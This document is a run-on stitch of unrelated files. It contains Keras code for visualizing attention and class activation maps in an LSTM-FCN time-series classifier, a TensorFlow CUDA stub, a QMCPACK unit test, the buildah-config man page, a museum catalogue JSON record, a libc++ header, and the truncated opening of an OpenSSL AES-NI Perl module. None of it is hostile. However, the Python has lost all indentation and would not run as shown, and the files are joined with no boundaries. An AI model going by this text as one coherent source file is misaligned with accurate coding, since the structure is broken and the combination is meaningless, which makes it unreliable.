if layer_names is not None and (type(layer_names) != list and type(layer_names) != tuple):
layer_names = [layer_names]
if outputs is None:
if layer_names is None:
outputs = [layer.output for layer in model.layers] # all layer outputs
else:
outputs = [layer.output for layer in model.layers if layer.name in layer_names]
else:
outputs = outputs
funcs = [K.function([inp] + [K.learning_phase()], [out]) for out in outputs] # evaluation functions
return funcs
def get_outputs(model, inputs, eval_functions, verbose=False):
"""
Gets the outputs of the Keras model.
Args:
model: Unused.
inputs: Input numpy arrays.
eval_functions: Keras functions for evaluation.
verbose: Whether to print evaluation metrics.
Returns:
List of outputs of the Keras Model.
"""
if verbose: print('----- activations -----')
outputs = []
layer_outputs = [func([inputs, 1.])[0] for func in eval_functions]
for layer_activations in layer_outputs:
outputs.append(layer_activations)
return outputs
def visualize_context_vector(model: Model, dataset_id, dataset_prefix, cutoff=None, limit=None,
normalize_timeseries=False, visualize_sequence=True, visualize_classwise=False):
"""
Visualize the Context Vector of the Attention LSTM.
Args:
model: an Attention LSTM-FCN Model.
        dataset_id: Integer id representing the dataset index contained in
`utils/constants.py`.
dataset_prefix: Name of the dataset. Used for weight saving.
cutoff: Optional integer which slices of the first `cutoff` timesteps
from the input signal.
limit: Number of samples to be visualized in one plot.
normalize_timeseries: Bool / Integer. Determines whether to normalize
the timeseries.
If False, does not normalize the time series.
If True / int not equal to 2, performs standard sample-wise
z-normalization.
If 2: Performs full dataset z-normalization.
        visualize_sequence: Bool flag, whether to visualize the sequence attended to
by the Context Vector or just the Context Vector itself.
        visualize_classwise: Bool flag. Whether to visualize the samples
            separated by class. When doing so, `limit` is multiplied by
the number of classes so it is better to set `limit` to 1 in
such cases.
"""
X_train, y_train, X_test, y_test, is_timeseries = load_dataset_at(dataset_id,
normalize_timeseries=normalize_timeseries)
_, sequence_length = calculate_dataset_metrics(X_train)
if sequence_length != MAX_SEQUENCE_LENGTH_LIST[dataset_id]:
if cutoff is None:
choice = cutoff_choice(dataset_id, sequence_length)
else:
assert cutoff in ['pre', 'post'], 'Cutoff parameter value must be either "pre" or "post"'
choice = cutoff
if choice not in ['pre', 'post']:
return
else:
X_train, X_test = cutoff_sequence(X_train, X_test, choice, dataset_id, sequence_length)
attn_lstm_layer = [(i, layer) for (i, layer) in enumerate(model.layers)
if layer.__class__.__name__ == 'AttentionLSTM']
if len(attn_lstm_layer) == 0:
raise AttributeError('Provided model does not have an Attention layer')
else:
i, attn_lstm_layer = attn_lstm_layer[0] # use first attention lstm layer only
attn_lstm_layer.return_attention = True
model.layers[i] = attn_lstm_layer
model.load_weights("./weights/%s_weights.h5" % dataset_prefix)
attention_output = model.layers[i].call(model.input)
eval_functions = build_function(model, attn_lstm_layer.name, outputs=[attention_output])
train_attention_vectors = []
test_attention_vectors = []
output_shape = [X_train.shape[-1], 1, 1]
for i in range(X_train.shape[0]):
activations = get_outputs(model,
X_train[i, :, :][np.newaxis, ...],
eval_functions,
verbose=False)[0]
# print("activations", activations.shape)
attention_vector = activations.reshape((-1, 1, 1))
attention_vector = (attention_vector - attention_vector.min()) / (
attention_vector.max() - attention_vector.min())
attention_vector = (attention_vector * 2.) - 1.
attention_vector = resize(attention_vector, output_shape, mode='reflect', anti_aliasing=True)
attention_vector = attention_vector.reshape([1, -1])
train_attention_vectors.append(attention_vector)
for i in range(X_test.shape[0]):
activations = get_outputs(model,
X_test[i, :, :][np.newaxis, ...],
eval_functions,
verbose=False)[0]
# print("activations", activations.shape)
attention_vector = activations.reshape((-1, 1, 1))
attention_vector = (attention_vector - attention_vector.min()) / (
attention_vector.max() - attention_vector.min())
attention_vector = (attention_vector * 2.) - 1.
attention_vector = resize(attention_vector, output_shape, mode='reflect', anti_aliasing=True)
attention_vector = attention_vector.reshape([1, -1])
test_attention_vectors.append(attention_vector)
train_attention_vectors = np.array(train_attention_vectors)
test_attention_vectors = np.array(test_attention_vectors)
print("Train Attention Vectors Shape :", train_attention_vectors.shape)
print("Test Attentin Vectors Shape :", test_attention_vectors.shape)
if visualize_sequence:
# plot input sequence part that is paid attention too in detail
X_train_attention = train_attention_vectors * X_train
X_test_attention = test_attention_vectors * X_test
plot_dataset(dataset_id, seed=1, limit=limit, cutoff=cutoff,
normalize_timeseries=normalize_timeseries, plot_data=(X_train, y_train, X_test, y_test,
X_train_attention, X_test_attention),
type='Context', plot_classwise=visualize_classwise)
else:
# plot only attention chart
choice = np.random.randint(0, train_attention_vectors.shape[0])
train_df = pd.DataFrame({'attention (%)': train_attention_vectors[choice, 0]},
index=range(train_attention_vectors.shape[-1]))
train_df.plot(kind='bar',
title='Attention Mechanism (Train) as '
'a function of input'
' dimensions. Class = %d' % (
y_train[choice]
))
plt.show()
def write_context_vector(model: Model, dataset_id, dataset_prefix, cutoff=None, limit=None,
normalize_timeseries=False, visualize_sequence=True, visualize_classwise=False):
""" Same as visualize_context_vector, but writes the context vectors to a file. Unused. """
X_train, y_train, X_test, y_test, is_timeseries = load_dataset_at(dataset_id,
normalize_timeseries=normalize_timeseries)
_, sequence_length = calculate_dataset_metrics(X_train)
if sequence_length != MAX_SEQUENCE_LENGTH_LIST[dataset_id]:
if cutoff is None:
choice = cutoff_choice(dataset_id, sequence_length)
else:
assert cutoff in ['pre', 'post'], 'Cutoff parameter value must be either "pre" or "post"'
choice = cutoff
if choice not in ['pre', 'post']:
return
else:
X_train, X_test = cutoff_sequence(X_train, X_test, choice, dataset_id, sequence_length)
attn_lstm_layer = [(i, layer) for (i, layer) in enumerate(model.layers)
if layer.__class__.__name__ == 'AttentionLSTM']
if len(attn_lstm_layer) == 0:
raise AttributeError('Provided model does not have an Attention layer')
else:
i, attn_lstm_layer = attn_lstm_layer[0] # use first attention lstm layer only
attn_lstm_layer.return_attention = True
model.layers[i] = attn_lstm_layer
model.load_weights("./weights/%s_weights.h5" % dataset_prefix)
attention_output = model.layers[i].call(model.input)
eval_functions = build_function(model, attn_lstm_layer.name, outputs=[attention_output])
train_attention_vectors = []
test_attention_vectors = []
if not os.path.exists('lstm_features/'):
os.makedirs('lstm_features/')
output_shape = [X_train.shape[-1], 1, 1]
for i in range(X_train.shape[0]):
activations = get_outputs(model,
X_train[i, :, :][np.newaxis, ...],
eval_functions,
verbose=False)[0]
# print("activations", activations.shape)
attention_vector = activations.reshape((-1, 1, 1))
attention_vector = (attention_vector - attention_vector.min()) / (
attention_vector.max() - attention_vector.min())
attention_vector = (attention_vector * 2.) - 1.
attention_vector = resize(attention_vector, output_shape, mode='reflect', anti_aliasing=True)
attention_vector = attention_vector.reshape([1, -1])
train_attention_vectors.append(attention_vector)
for i in range(X_test.shape[0]):
activations = get_outputs(model,
X_test[i, :, :][np.newaxis, ...],
eval_functions,
verbose=False)[0]
# print("activations", activations.shape)
attention_vector = activations.reshape((-1, 1, 1))
attention_vector = (attention_vector - attention_vector.min()) / (
attention_vector.max() - attention_vector.min())
attention_vector = (attention_vector * 2.) - 1.
attention_vector = resize(attention_vector, output_shape, mode='reflect', anti_aliasing=True)
attention_vector = attention_vector.reshape([1, -1])
test_attention_vectors.append(attention_vector)
train_attention_vectors = np.array(train_attention_vectors)
test_attention_vectors = np.array(test_attention_vectors)
print("Train Attention Vectors Shape :", train_attention_vectors.shape)
print("Test Attentin Vectors Shape :", test_attention_vectors.shape)
if visualize_sequence:
# plot input sequence part that is paid attention too in detail
X_train_attention = train_attention_vectors * X_train
X_test_attention = test_attention_vectors * X_test
X_train_attention = X_train_attention.squeeze(1)
X_test_attention = X_test_attention.squeeze(1)
df = pd.DataFrame(X_test_attention)
df['label'] = y_test[:, 0]
df.to_csv('lstm_features/features.csv')
else:
# plot only attention chart
choice = np.random.randint(0, train_attention_vectors.shape[0])
train_df = pd.DataFrame({'attention (%)': train_attention_vectors[choice, 0]},
index=range(train_attention_vectors.shape[-1]))
train_df.plot(kind='bar',
title='Attention Mechanism (Train) as '
'a function of input'
' dimensions. Class = %d' % (
y_train[choice]
))
plt.show()
def visualize_cam(model: Model, dataset_id, dataset_prefix, class_id,
cutoff=None, normalize_timeseries=False, seed=0):
"""
Used to visualize the Class Activation Maps of the Keras Model.
Args:
model: A Keras Model.
        dataset_id: Integer id representing the dataset index contained in
            `utils/constants.py`.
dataset_prefix: Name of the dataset. Used for weight saving.
class_id: Index of the class whose activation is to be visualized.
        cutoff: Optional integer which slices off the first `cutoff` timesteps
            from the input signal.
normalize_timeseries: Bool / Integer. Determines whether to normalize
the timeseries.
If False, does not normalize the time series.
If True / int not equal to 2, performs standard sample-wise
z-normalization.
If 2: Performs full dataset z-normalization.
seed: Random seed number for Numpy.
"""
np.random.seed(seed)
X_train, y_train, _, _, is_timeseries = load_dataset_at(dataset_id,
normalize_timeseries=normalize_timeseries)
_, sequence_length = calculate_dataset_metrics(X_train)
if sequence_length != MAX_SEQUENCE_LENGTH_LIST[dataset_id]:
if cutoff is None:
choice = cutoff_choice(dataset_id, sequence_length)
else:
assert cutoff in ['pre', 'post'], 'Cutoff parameter value must be either "pre" or "post"'
choice = cutoff
if choice not in ['pre', 'post']:
return
else:
X_train, _ = cutoff_sequence(X_train, _, choice, dataset_id, sequence_length)
model.load_weights("./weights/%s_weights.h5" % dataset_prefix)
class_weights = model.layers[-1].get_weights()[0]
conv_layers = [layer for layer in model.layers if layer.__class__.__name__ == 'Conv1D']
final_conv = conv_layers[-1].name
final_softmax = model.layers[-1].name
out_names = [final_conv, final_softmax]
if class_id > 0:
class_id = class_id - 1
y_train_ids = np.where(y_train[:, 0] == class_id)
sequence_input = X_train[y_train_ids[0], ...]
choice = np.random.choice(range(len(sequence_input)), 1)
sequence_input = sequence_input[choice, :, :]
eval_functions = build_function(model, out_names)
conv_out, predictions = get_outputs(model, sequence_input, eval_functions)
conv_out = conv_out[0, :, :] # (T, C)
conv_out = (conv_out - conv_out.min(axis=0, keepdims=True)) / \
(conv_out.max(axis=0, keepdims=True) - conv_out.min(axis=0, keepdims=True))
conv_out = (conv_out * 2.) - 1.
conv_out = conv_out.transpose((1, 0)) # (C, T)
conv_channels = conv_out.shape[0]
conv_cam = class_weights[:conv_channels, [class_id]] * conv_out
conv_cam = np.sum(conv_cam, axis=0)
conv_cam /= conv_cam.max()
sequence_input = sequence_input.reshape((-1, 1))
conv_cam = conv_cam.reshape((-1, 1))
sequence_df = pd.DataFrame(sequence_input,
index=range(sequence_input.shape[0]),
columns=range(sequence_input.shape[1]))
conv_cam_df = pd.DataFrame(conv_cam,
index=range(conv_cam.shape[0]),
columns=[1])
fig, axs = plt.subplots(2, 1, squeeze=False,
figsize=(6, 6))
class_label = class_id + 1
sequence_df.plot(title='Sequence (class = %d)' % (class_label),
subplots=False,
legend=None,
ax=axs[0][0])
conv_cam_df.plot(title='Convolution Class Activation Map (class = %d)' % (class_label),
subplots=False,
legend=None,
ax=axs[1][0])
plt.show()
def write_cam(model: Model, dataset_id, dataset_prefix,
cutoff=None, normalize_timeseries=False):
""" Same as visualize_cam, but writes the result data to a file. """
_, _, X_test, y_test, is_timeseries = load_dataset_at(dataset_id,
normalize_timeseries=normalize_timeseries)
_, sequence_length = calculate_dataset_metrics(X_test)
if sequence_length != MAX_SEQUENCE_LENGTH_LIST[dataset_id]:
if cutoff is None:
choice = cutoff_choice(dataset_id, sequence_length)
else:
assert cutoff in ['pre', 'post'], 'Cutoff parameter value must be either "pre" or "post"'
choice = cutoff
if choice not in ['pre', 'post']:
return
else:
            _, X_test = cutoff_sequence(_, X_test, choice, dataset_id, sequence_length)
print("Weights path : ", "./weights/%s_weights.h5" % dataset_prefix)
model.load_weights("./weights/%s_weights.h5" % dataset_prefix)
class_weights = model.layers[-1].get_weights()[0]
conv_layers = [layer for layer in model.layers if layer.__class__.__name__ == 'Conv1D']
final_conv = conv_layers[-1].name
final_softmax = model.layers[-1].name
out_names = [final_conv, final_softmax]
eval_functions = build_function(model, out_names)
parts = os.path.split(dataset_prefix)
    if len(parts[0]) > 0:  # dataset_prefix contains a directory component
        basepath = os.path.join('cam_features', parts[0])
dataset_name = parts[-1]
else:
basepath = 'cam_features/'
dataset_name = dataset_prefix
if not os.path.exists(basepath):
os.makedirs(basepath)
cam_features = []
for i in range(X_test.shape[0]):
print("Sample %d running" % (i + 1))
y_id = y_test[i, 0]
sequence_input = X_test[[i], :, :]
conv_out, predictions = get_outputs(model, sequence_input, eval_functions)
conv_out = conv_out[0, :, :] # (T, C)
conv_out = conv_out.transpose((1, 0)) # (C, T)
conv_channels = conv_out.shape[0]
conv_cam = class_weights[:conv_channels, [int(y_id)]] * conv_out
conv_cam = np.mean(conv_cam, axis=0)
conv_cam = conv_cam.reshape((-1, 1))
cam_features.append(conv_cam)
cam_features = np.concatenate(cam_features, -1).transpose()
print("Num features = ", cam_features.shape)
conv_cam_df = pd.DataFrame(cam_features)
conv_cam_df.to_csv(basepath + '/%s_features_mean_unnormalized.csv' % dataset_name,
header=False, index=False)
def visualize_filters(model: Model, dataset_id, dataset_prefix,
conv_id=0, filter_id=0, seed=0, cutoff=None,
normalize_timeseries=False):
"""
Used to visualize the output filters of a particular convolution layer.
Args:
model: A Keras Model.
        dataset_id: Integer id representing the dataset index contained in
            `utils/constants.py`.
dataset_prefix: Name of the dataset. Used for weight saving.
conv_id: Convolution layer ID. Can be 0, 1 or 2 for LSTMFCN and
its univariate variants (as it uses 3 Conv blocks).
filter_id: ID of the filter that is under observation.
seed: Numpy random seed.
        cutoff: Optional integer which slices off the first `cutoff` timesteps
            from the input signal.
normalize_timeseries: Bool / Integer. Determines whether to normalize
the timeseries.
If False, does not normalize the time series.
If True / int not equal to 2, performs standard sample-wise
z-normalization.
If 2: Performs full dataset z-normalization.
"""
np.random.seed(seed)
assert conv_id >= 0 and conv_id < 3, "Convolution layer ID must be between 0 and 2"
X_train, y_train, _, _, is_timeseries = load_dataset_at(dataset_id,
normalize_timeseries=normalize_timeseries)
_, sequence_length = calculate_dataset_metrics(X_train)
if sequence_length != MAX_SEQUENCE_LENGTH_LIST[dataset_id]:
if cutoff is None:
choice = cutoff_choice(dataset_id, sequence_length)
else:
assert cutoff in ['pre', 'post'], 'Cutoff parameter value must be either "pre" or "post"'
choice = cutoff
if choice not in ['pre', 'post']:
return
else:
X_train, _ = cutoff_sequence(X_train, _, choice, dataset_id, sequence_length)
model.load_weights("./weights/%s_weights.h5" % dataset_prefix)
conv_layers = [layer for layer in model.layers
if layer.__class__.__name__ == 'Conv1D']
conv_layer = conv_layers[conv_id]
conv_layer_name = conv_layer.name
eval_functions = build_function(model, [conv_layer_name])
save_dir = os.path.split(dataset_prefix)[0]
if not os.path.exists('cnn_filters/%s' % (save_dir)):
os.makedirs('cnn_filters/%s' % (save_dir))
dataset_name = os.path.split(dataset_prefix)[-1]
if dataset_name is None or len(dataset_name) == 0:
dataset_name = dataset_prefix
# Select single datapoint
sample_index = np.random.randint(0, X_train.shape[0])
y_id = y_train[sample_index, 0]
sequence_input = X_train[[sample_index], :, :]
# Get features of the cnn layer out
conv_out = get_outputs(model, sequence_input, eval_functions)[0]
conv_out = conv_out[0, :, :] # [T, C]
# select single filter
    assert 0 <= filter_id < conv_out.shape[-1], "Filter ID must be in range [0, number of filters)"
channel = conv_out[:, filter_id]
channel = channel.reshape((-1, 1))
conv_filters = pd.DataFrame(channel)
conv_filters.to_csv('cnn_filters/%s_features.csv' % (dataset_prefix), header=None, index=False)
sequence_input = sequence_input[0, :, :].transpose()
sequence_df = pd.DataFrame(sequence_input,
index=range(sequence_input.shape[0]))
conv_cam_df = pd.DataFrame(conv_filters,
index=range(conv_filters.shape[0]))
fig, axs = plt.subplots(2, 1, squeeze=False,
figsize=(6, 6))
class_label = y_id + 1
plt.rcParams.update({'font.size': 24})
sequence_df.plot(title='Dataset %s : Sequence ID = %d (class = %d)' % (dataset_name,
sample_index + 1,
class_label),
subplots=False,
legend=None,
ax=axs[0][0])
conv_cam_df.plot(title='Convolution Layer %d Filter ID %d (class = %d)' % (conv_id + 1,
filter_id + 1,
class_label),
subplots=False,
legend=None,
ax=axs[1][0])
# Formatting
plt.xlabel('Timesteps', axes=axs[0][0])
axs[0][0].set_ylabel('Value')
axs[1][0].set_ylabel('Value')
def mjrFormatter(x, pos):
return '{:.2f}'.format(x)
plt.gca().yaxis.set_major_formatter(FuncFormatter(mjrFormatter))
plt.show()
def extract_features(model: Model, dataset_id, dataset_prefix,
layer_name, cutoff=None, normalize_timeseries=False):
""" Same as visualize_features, but saves them to a file instead. """
layer_name = layer_name.lower()
assert layer_name in ['cnn', 'lstm', 'lstmfcn']
X_train, y_train, X_test, y_test, is_timeseries = load_dataset_at(dataset_id,
normalize_timeseries=normalize_timeseries)
_, sequence_length = calculate_dataset_metrics(X_train)
if sequence_length != MAX_SEQUENCE_LENGTH_LIST[dataset_id]:
if cutoff is None:
choice = cutoff_choice(dataset_id, sequence_length)
else:
assert cutoff in ['pre', 'post'], 'Cutoff parameter value must be either "pre" or "post"'
choice = cutoff
if choice not in ['pre', 'post']:
return
else:
X_train, X_test = cutoff_sequence(X_train, X_test, choice, dataset_id, sequence_length)
model.load_weights("./weights/%s_weights.h5" % dataset_prefix)
conv_layers = [layer for layer in model.layers
if layer.__class__.__name__ == 'Conv1D']
lstm_layers = [layer for layer in model.layers
if layer.__class__.__name__ == 'LSTM' or
layer.__class__.__name__ == 'AttentionLSTM']
lstmfcn_layer = model.layers[-2]
if layer_name == 'cnn':
feature_layer = conv_layers[-1]
elif layer_name == 'lstm':
feature_layer = lstm_layers[-1]
else:
feature_layer = lstmfcn_layer
dataset_name = os.path.split(dataset_prefix)[-1]
if dataset_name is None or len(dataset_name) == 0:
dataset_name = dataset_prefix
save_dir = 'layer_features/%s/' % dataset_name
if not os.path.exists(save_dir):
os.makedirs(save_dir)
extraction_model = Model(model.input, feature_layer.output)
train_features = extraction_model.predict(X_train, batch_size=128)
test_features = extraction_model.predict(X_test, batch_size=128)
shape = train_features.shape
if len(shape) > 2:
train_features = train_features.reshape((shape[0], shape[1] * shape[2]))
shape = test_features.shape
if len(shape) > 2:
test_features = test_features.reshape((shape[0], shape[1] * shape[2]))
print("Train feature shape : ", train_features.shape, "Classes : ", len(np.unique(y_train)))
print("Test features shape : ", test_features.shape, "Classes : ", len(np.unique(y_test)))
np.save(save_dir + '%s_%s_train_features.npy' % (layer_name, dataset_name), train_features)
np.save(save_dir + '%s_%s_train_labels.npy' % (layer_name, dataset_name), y_train)
np.save(save_dir + '%s_%s_test_features.npy' % (layer_name, dataset_name), test_features)
np.save(save_dir + '%s_%s_test_labels.npy' % (layer_name, dataset_name), y_test)
print("Saved train feature vectors at %s" % (save_dir + '%s_%s_train_features.npy' % (layer_name, dataset_name)))
print("Saved test feature vectors at %s" % (save_dir + '%s_%s_test_features.npy' % (layer_name, dataset_name)))
print()
class MaskablePermute(Permute):
def __init__(self, dims, **kwargs):
super(MaskablePermute, self).__init__(dims, **kwargs)
self.supports_masking = True
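# A minimal usage sketch: assuming a Keras `model` that has already been built
# to match the trained weights stored at "./weights/<dataset_prefix>_weights.h5",
# the helpers above can be chained roughly as shown below. The function is
# purely illustrative (it is not referenced anywhere else in this module), and
# the dataset index / prefix values are whatever was registered in
# `utils/constants.py` for the experiment at hand.
def _example_visualization_run(model, dataset_id, dataset_prefix):
    """Illustrative driver for the visualization helpers defined above."""
    # Class Activation Map of a randomly chosen training sample of class 0
    visualize_cam(model, dataset_id, dataset_prefix, class_id=0,
                  normalize_timeseries=True)
    # Per-sample CAM features for the test split, written under cam_features/
    write_cam(model, dataset_id, dataset_prefix, normalize_timeseries=True)
    # Final LSTM-FCN embeddings for train/test, written under layer_features/
    extract_features(model, dataset_id, dataset_prefix, layer_name='lstmfcn',
                     normalize_timeseries=True)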
/* Copyright 2016 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
#if GOOGLE_CUDA
#include "tensorflow/core/kernels/cwise_ops_gpu_common.cu.h"
namespace tensorflow {
namespace functor {
DEFINE_BINARY4(squared_difference, float, Eigen::half, double, int64);
} // namespace functor
} // namespace tensorflow
#endif // GOOGLE_CUDA
//////////////////////////////////////////////////////////////////////////////////////
// This file is distributed under the University of Illinois/NCSA Open Source License.
// See LICENSE file in top directory for details.
//
// Copyright (c) 2019 QMCPACK developers.
//
// File developed by: Peter Doak, [email protected], Oak Ridge National Laboratory
//
// File created by: Peter Doak, [email protected], Oak Ridge National Laboratory
//////////////////////////////////////////////////////////////////////////////////////
#include "catch.hpp"
#include "QMCDrivers/VMC/VMCDriverInput.h"
#include "QMCDrivers/tests/ValidQMCInputSections.h"
#include "OhmmsData/Libxml2Doc.h"
namespace qmcplusplus
{
TEST_CASE("VMCDriverInput readXML", "[drivers]")
{
auto xml_test = [](const char* driver_xml) {
Libxml2Document doc;
bool okay = doc.parseFromString(driver_xml);
REQUIRE(okay);
xmlNodePtr node = doc.getRoot();
VMCDriverInput vmcdriver_input;
vmcdriver_input.readXML(node);
REQUIRE(vmcdriver_input.get_use_drift() == false);
};
std::for_each(testing::valid_vmc_input_sections.begin(), testing::valid_vmc_input_sections.end(), xml_test);
}
} // namespace qmcplusplus
# buildah-config "1" "March 2017" "buildah"
## NAME
buildah\-config - Update image configuration settings.
## SYNOPSIS
**buildah config** [*options*] *container*
## DESCRIPTION
Updates one or more of the settings kept for a container.
## OPTIONS
**--add-history**
Add an entry to the image's history which will note changes to the settings for
**--cmd**, **--entrypoint**, **--env**, **--healthcheck**, **--label**,
**--onbuild**, **--port**, **--shell**, **--stop-signal**, **--user**,
**--volume**, and **--workingdir**.
Defaults to false.
Note: You can also override the default value of --add-history by setting the
BUILDAH\_HISTORY environment variable. `export BUILDAH_HISTORY=true`
**--annotation** *annotation*=*annotation*
Add an image *annotation* (e.g. annotation=*annotation*) to the image manifest
of any images which will be built using the specified container. Can be used multiple times.
If *annotation* has a trailing `-`, then the *annotation* is removed from the config.
**--arch** *architecture*
Set the target *architecture* for any images which will be built using the
specified container. By default, if the container was based on an image, that
image's target architecture is kept, otherwise the host's architecture is
recorded.
**--author** *author*
Set contact information for the *author* for any images which will be built
using the specified container.
**--cmd** *command*
Set the default *command* to run for containers based on any images which will
be built using the specified container. When used in combination with an
*entry point*, this specifies the default parameters for the *entry point*.
**--comment** *comment*
Set the image-level comment for any images which will be built using the
specified container.
Note: this setting is not present in the OCIv1 image format, so it is discarded when writing images using OCIv1 formats.
**--created-by** *created*
Set the description of how the topmost layer was *created* for any images which
will be created using the specified container.
**--domainname** *domain*
Set the domainname to use when running containers based on any images built
using the specified container.
Note: this setting is not present in the OCIv1 image format, so it is discarded when writing images using OCIv1 formats.
**--entrypoint** *"command"* | *'["command", "arg1", ...]'*
Set the *entry point* for containers based on any images which will be built
using the specified container. buildah supports two formats for entrypoint. It
can be specified as a simple string, or as an array of commands.
Note: When the entrypoint is specified as a string, container runtimes will
ignore the `cmd` value of the container image. However, if you use the array
form, then the cmd will be appended to the end of the entrypoint, and the two
will be executed together.
**--env** *env=value*
Add a value (e.g. env=*value*) to the environment for containers based on any
images which will be built using the specified container. Can be used multiple times.
If *env* has a trailing `-`, then the *env* is removed from the config.
**--healthcheck** *command*
Specify a command which should be run to check if a container is running correctly.
Values can be *NONE*, "*CMD* ..." (run the specified command directly), or
"*CMD-SHELL* ..." (run the specified command using the system's shell), or the
empty value (remove a previously-set value and related settings).
Note: this setting is not present in the OCIv1 image format, so it is discarded when writing images using OCIv1 formats.
**--healthcheck-interval** *interval*
Specify how often the command specified using the *--healthcheck* option should
be run.
Note: this setting is not present in the OCIv1 image format, so it is discarded when writing images using OCIv1 formats.
**--healthcheck-retries** *count*
Specify how many times the command specified using the *--healthcheck* option
can fail before the container is considered to be unhealthy.
Note: this setting is not present in the OCIv1 image format, so it is discarded when writing images using OCIv1 formats.
**--healthcheck-start-period** *interval*
Specify how much time can elapse after a container has started before a failure
to run the command specified using the *--healthcheck* option should be treated
as an indication that the container is failing. During this time period,
failures will be attributed to the container not yet having fully started, and
will not be counted as errors. After the command succeeds, or the time period
has elapsed, failures will be counted as errors.
Note: this setting is not present in the OCIv1 image format, so it is discarded when writing images using OCIv1 formats.
**--healthcheck-timeout** *interval*
Specify how long to wait, after starting the command specified using the
*--healthcheck* option, for the command to return its exit status. If
the command has not returned within this time, it should be considered to have
failed.
Note: this setting is not present in the OCIv1 image format, so it is discarded when writing images using OCIv1 formats.
**--history-comment** *comment*
Sets a comment on the topmost layer in any images which will be created
using the specified container.
**--hostname** *host*
Set the hostname to use when running containers based on any images built using
the specified container.
Note: this setting is not present in the OCIv1 image format, so it is discarded when writing images using OCIv1 formats.
**--label** *label*=*value*
Add an image *label* (e.g. label=*value*) to the image configuration of any
images which will be built using the specified container. Can be used multiple times.
If *label* has a trailing `-`, then the *label* is removed from the config.
**--onbuild** *onbuild command*
Add an ONBUILD command to the image. ONBUILD commands are automatically run
when images are built based on the image you are creating.
Note: this setting is not present in the OCIv1 image format, so it is discarded when writing images using OCIv1 formats.
**--os** *operating system*
Set the target *operating system* for any images which will be built using
the specified container. By default, if the container was based on an image,
its OS is kept, otherwise the host's OS's name is recorded.
**--port** *port*
Add a *port* to expose when running containers based on any images which
will be built using the specified container. Can be used multiple times.
**--shell** *shell*
Set the default *shell* to run inside of the container image.
The shell instruction allows the default shell used for the shell form of commands to be overridden. The default shell for Linux containers is "/bin/sh -c".
Note: this setting is not present in the OCIv1 image format, so it is discarded when writing images using OCIv1 formats.
**--stop-signal** *signal*
Set the default *stop signal* for the container. This signal will be sent when the container is stopped; the default is SIGINT.
**--user** *user*[:*group*]
Set the default *user* to be used when running containers based on this image.
The user can be specified as a user name
or UID, optionally followed by a group name or GID, separated by a colon (':').
If names are used, the container should include entries for those names in its
*/etc/passwd* and */etc/group* files.
**--volume** *volume*
Add a location in the directory tree which should be marked as a *volume* in any images which will be built using the specified container. Can be used multiple times. If *volume* has a trailing `-`, and is already set, then the *volume* is removed from the config.
**--workingdir** *directory*
Set the initial working *directory* for containers based on images which will
be built using the specified container.
## EXAMPLE
buildah config --author='Jane Austen' --workingdir='/etc/mycontainers' containerID
buildah config --entrypoint /entrypoint.sh containerID
buildah config --entrypoint '[ "/entrypoint.sh", "dev" ]' containerID
buildah config --env foo=bar --env PATH=$PATH containerID
buildah config --env foo- containerID
buildah config --label Name=Mycontainer --label Version=1.0 containerID
buildah config --label Name- containerID
buildah config --annotation note=myNote containerID
buildah config --annotation note- containerID
buildah config --volume /usr/myvol containerID
buildah config --volume /usr/myvol- containerID
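A shell-form health check, assuming the image provides `curl` and giving the interval as a duration such as 30s, might look like:
buildah config --healthcheck "CMD-SHELL curl -f http://localhost/ || exit 1" --healthcheck-interval 30s --healthcheck-retries 3 containerID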
## SEE ALSO
buildah(1)
{
"id": "35262185",
"url": "https:\/\/collection.cooperhewitt.org\/types\/35262185\/",
"name": "grille",
"count_objects": "1",
"supersedes": "0",
"superseded_by": "0"
}
// -*- C++ -*-
//===------------------------- unordered_set ------------------------------===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
#ifndef _LIBCPP_EXPERIMENTAL_UNORDERED_SET
#define _LIBCPP_EXPERIMENTAL_UNORDERED_SET
/*
experimental/unordered_set synopsis
// C++1z
namespace std {
namespace experimental {
inline namespace fundamentals_v1 {
namespace pmr {
template <class T, class Hash = hash<T>, class Pred = equal_to<T>>
using unordered_set = std::unordered_set<T, Hash, Pred,
polymorphic_allocator<T>>;
template <class T, class Hash = hash<T>, class Pred = equal_to<T>>
using unordered_multiset = std::unordered_multiset<T, Hash, Pred,
polymorphic_allocator<T>>;
} // namespace pmr
} // namespace fundamentals_v1
} // namespace experimental
} // namespace std
*/
#include <experimental/__config>
#include <unordered_set>
#include <experimental/memory_resource>
#if !defined(_LIBCPP_HAS_NO_PRAGMA_SYSTEM_HEADER)
#pragma GCC system_header
#endif
_LIBCPP_BEGIN_NAMESPACE_LFTS_PMR
template <class _Value,
class _Hash = hash<_Value>, class _Pred = equal_to<_Value>>
using unordered_set = _VSTD::unordered_set<_Value, _Hash, _Pred,
polymorphic_allocator<_Value>>;
template <class _Value,
class _Hash = hash<_Value>, class _Pred = equal_to<_Value>>
using unordered_multiset = _VSTD::unordered_multiset<_Value, _Hash, _Pred,
polymorphic_allocator<_Value>>;
_LIBCPP_END_NAMESPACE_LFTS_PMR
#endif /* _LIBCPP_EXPERIMENTAL_UNORDERED_SET */
#!/usr/bin/env perl
#
# ====================================================================
# Written by Andy Polyakov <[email protected]> for the OpenSSL
# project. The module is, however, dual licensed under OpenSSL and
# CRYPTOGAMS licenses depending on where you obtain it. For further
# details see http://www.openssl.org/~appro/cryptogams/.
# ====================================================================
#
# This module implements support for Intel AES-NI extension. In
# OpenSSL context it's used with Intel engine, but can also be used as
# drop-in replacement for crypto/aes/asm/aes-x86_64.pl [see below for
# details].
#
# Performance.
#
# Given aes(enc|dec) instructions' latency asymptotic performance for
# non-parallelizable modes such as CBC encrypt is 3.75 cycles per byte
# processed with 128-bit key. And given their throughput asymptotic
# performance for parallelizable modes is 1.25 cycles per byte. Being an
# asymptotic limit, it's not something you commonly achieve in reality,
# but how close does one get? Below are results collected for
# different modes and block sizes. Pairs of numbers are for en-/
# decryption.
#
# 16-byte 64-byte 256-byte 1-KB 8-KB
# ECB 4.25/4.25 1.38/1.38 1.28/1.28 1.26/1.26 1.26/1.26
